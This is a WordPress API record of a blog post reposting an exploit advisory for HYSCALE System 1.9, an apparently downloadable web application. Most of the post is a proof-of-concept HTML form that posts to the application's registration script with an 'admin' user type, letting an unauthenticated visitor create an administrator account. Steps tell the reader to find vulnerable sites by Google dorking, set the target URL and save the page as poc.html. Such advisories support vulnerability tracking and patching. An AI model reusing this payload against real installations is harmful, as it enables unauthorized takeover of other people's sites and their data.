{"id":59790,"date":"2024-09-18T18:50:19","date_gmt":"2024-09-18T15:50:19","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181597\/hyscalesystem19-xsrf.txt"},"modified":"2024-09-18T18:50:19","modified_gmt":"2024-09-18T15:50:19","slug":"hyscale-system-1-9-add-administrator-cross-site-request-forgery","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/hyscale-system-1-9-add-administrator-cross-site-request-forgery\/","title":{"rendered":"HYSCALE System 1.9 Add Administrator \/ Cross Site Request Forgery"},"content":{"rendered":"

=============================================================================================================================================
| # Title : HYSCALE System v1.9 CSRF add admin Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https:\/\/www.kashipara.com\/project\/download\/project2\/user\/2024\/202402\/kashipara.com_hyscaler19-zip.zip |
=============================================================================================================================================<\/p>\n

poc :<\/p>\n[+] Dorking \u0130n Google Or Other Search Enggine.<\/p>\n[+] This HTML page is designed to remotely add new admin.<\/p>\n[+] Line 10 : Set your target url<\/p>\n[+] save payload as poc.html <\/p>\n[+] payload : <\/p>\n

<!DOCTYPE html>
<html lang=”en”>
<head>
<meta charset=”UTF-8″>
<meta name=”viewport” content=”width=device-width, initial-scale=1.0″>
<title>Registration Form<\/title>
<\/head>
<body><\/p>\n

<form action=”http:\/\/127.0.0.1\/HYSCALER19\/registration_submit.php” method=”POST”><\/p>\n

<label for=”username”>Username:<\/label>
<input type=”text” name=”username” id=”username” required><br><br><\/p>\n

<label for=”email”>Email:<\/label>
<input type=”email” name=”email” id=”email” required><br><br><\/p>\n

<label for=”password”>Password:<\/label>
<input type=”password” name=”password” id=”password” required><br><br><\/p>\n

<label for=”dob”>Date of Birth:<\/label>
<input type=”text” name=”dob” id=”dob” placeholder=”YYYY-MM-DD” required><br><br><\/p>\n

<label>Gender:<\/label><br>
<input type=”radio” name=”gender” value=”Male” id=”male” required>
<label for=”male”>Male<\/label><br>
<input type=”radio” name=”gender” value=”Female” id=”female”>
<label for=”female”>Female<\/label><br><br><\/p>\n

<label for=”usertype”>User Type:<\/label>
<select name=”usertype” id=”usertype” required>
<option value=”admin”>Admin<\/option>
<option value=”user”>User<\/option>
<option value=”guest”>Guest<\/option>
<\/select><br><br><\/p>\n

<label for=”target_sales”>Target Sales:<\/label>
<input type=”text” name=”target_sales” id=”target_sales” required><br><br><\/p>\n

<input type=”submit” value=”Submit”><\/p>\n

<\/form><\/p>\n

<\/body>
<\/html><\/p>\n

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================<\/p>\n","protected":false},"excerpt":{"rendered":"

=============================================================================================================================================| # Title : HYSCALE System v1.9 CSRF add admin Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 128.0.3 (64 bits) || # Vendor : https:\/\/www.kashipara.com\/project\/download\/project2\/user\/2024\/202402\/kashipara.com_hyscaler19-zip.zip |============================================================================================================================================= poc : [+] Dorking \u0130n Google Or Other Search Enggine. [+] This HTML page is designed to …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59790","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59790","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59790"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59790\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59790"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59790"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59790"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}